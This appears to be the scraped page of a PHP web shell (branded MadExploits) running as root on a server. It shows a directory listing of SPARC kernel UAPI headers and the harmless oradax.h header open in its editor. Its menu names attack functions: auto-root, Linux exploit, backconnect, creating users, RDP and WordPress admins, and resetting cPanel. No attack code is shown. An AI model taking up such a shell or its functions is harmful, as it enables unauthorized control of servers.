Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
linux /
uapi /
sparc /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
apc.h
1.7
KB
-rw-r--r--
asi.h
15.01
KB
-rw-r--r--
auxvec.h
348
B
-rw-r--r--
bitsperlong.h
324
B
-rw-r--r--
bpf_perf_event.h
40
B
-rw-r--r--
byteorder.h
191
B
-rw-r--r--
display7seg.h
1.9
KB
-rw-r--r--
envctrl.h
3.41
KB
-rw-r--r--
errno.h
5.41
KB
-rw-r--r--
fbio.h
7.62
KB
-rw-r--r--
fcntl.h
1.75
KB
-rw-r--r--
ioctl.h
2.58
KB
-rw-r--r--
ioctls.h
5.98
KB
-rw-r--r--
ipcbuf.h
808
B
-rw-r--r--
mman.h
993
B
-rw-r--r--
msgbuf.h
1.19
KB
-rw-r--r--
openpromio.h
2.07
KB
-rw-r--r--
oradax.h
1.97
KB
-rw-r--r--
param.h
253
B
-rw-r--r--
perfctr.h
5.56
KB
-rw-r--r--
poll.h
273
B
-rw-r--r--
posix_types.h
1.73
KB
-rw-r--r--
psr.h
2.2
KB
-rw-r--r--
psrcompat.h
2.03
KB
-rw-r--r--
pstate.h
6.28
KB
-rw-r--r--
ptrace.h
8.01
KB
-rw-r--r--
resource.h
770
B
-rw-r--r--
sembuf.h
896
B
-rw-r--r--
setup.h
295
B
-rw-r--r--
shmbuf.h
1.41
KB
-rw-r--r--
sigcontext.h
167
B
-rw-r--r--
siginfo.h
375
B
-rw-r--r--
signal.h
4.56
KB
-rw-r--r--
socket.h
4.17
KB
-rw-r--r--
sockios.h
33
B
-rw-r--r--
stat.h
2.01
KB
-rw-r--r--
statfs.h
32
B
-rw-r--r--
swab.h
1.02
KB
-rw-r--r--
termbits.h
5
KB
-rw-r--r--
termios.h
1.03
KB
-rw-r--r--
traps.h
5.13
KB
-rw-r--r--
types.h
31
B
-rw-r--r--
uctx.h
1.39
KB
-rw-r--r--
unistd.h
889
B
-rw-r--r--
unistd_32.h
11.54
KB
-rw-r--r--
unistd_64.h
10.43
KB
-rw-r--r--
utrap.h
1.5
KB
-rw-r--r--
watchdog.h
1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : oradax.h
/* SPDX-License-Identifier: GPL-2.0-or-later WITH Linux-syscall-note */ /* * Copyright (c) 2017, Oracle and/or its affiliates. All rights reserved. */ /* * Oracle DAX driver API definitions */ #ifndef _ORADAX_H #define _ORADAX_H #include <linux/types.h> #define CCB_KILL 0 #define CCB_INFO 1 #define CCB_DEQUEUE 2 struct dax_command { __u16 command; /* CCB_KILL/INFO/DEQUEUE */ __u16 ca_offset; /* offset into mmapped completion area */ }; struct ccb_kill_result { __u16 action; /* action taken to kill ccb */ }; struct ccb_info_result { __u16 state; /* state of enqueued ccb */ __u16 inst_num; /* dax instance number of enqueued ccb */ __u16 q_num; /* queue number of enqueued ccb */ __u16 q_pos; /* ccb position in queue */ }; struct ccb_exec_result { __u64 status_data; /* additional status data (e.g. bad VA) */ __u32 status; /* one of DAX_SUBMIT_* */ }; union ccb_result { struct ccb_exec_result exec; struct ccb_info_result info; struct ccb_kill_result kill; }; #define DAX_MMAP_LEN (16 * 1024) #define DAX_MAX_CCBS 15 #define DAX_CCB_BUF_MAXLEN (DAX_MAX_CCBS * 64) #define DAX_NAME "oradax" /* CCB_EXEC status */ #define DAX_SUBMIT_OK 0 #define DAX_SUBMIT_ERR_RETRY 1 #define DAX_SUBMIT_ERR_WOULDBLOCK 2 #define DAX_SUBMIT_ERR_BUSY 3 #define DAX_SUBMIT_ERR_THR_INIT 4 #define DAX_SUBMIT_ERR_ARG_INVAL 5 #define DAX_SUBMIT_ERR_CCB_INVAL 6 #define DAX_SUBMIT_ERR_NO_CA_AVAIL 7 #define DAX_SUBMIT_ERR_CCB_ARR_MMU_MISS 8 #define DAX_SUBMIT_ERR_NOMAP 9 #define DAX_SUBMIT_ERR_NOACCESS 10 #define DAX_SUBMIT_ERR_TOOMANY 11 #define DAX_SUBMIT_ERR_UNAVAIL 12 #define DAX_SUBMIT_ERR_INTERNAL 13 /* CCB_INFO states - must match HV_CCB_STATE_* definitions */ #define DAX_CCB_COMPLETED 0 #define DAX_CCB_ENQUEUED 1 #define DAX_CCB_INPROGRESS 2 #define DAX_CCB_NOTFOUND 3 /* CCB_KILL actions - must match HV_CCB_KILL_* definitions */ #define DAX_KILL_COMPLETED 0 #define DAX_KILL_DEQUEUED 1 #define DAX_KILL_KILLED 2 #define DAX_KILL_NOTFOUND 3 #endif /* _ORADAX_H */
Close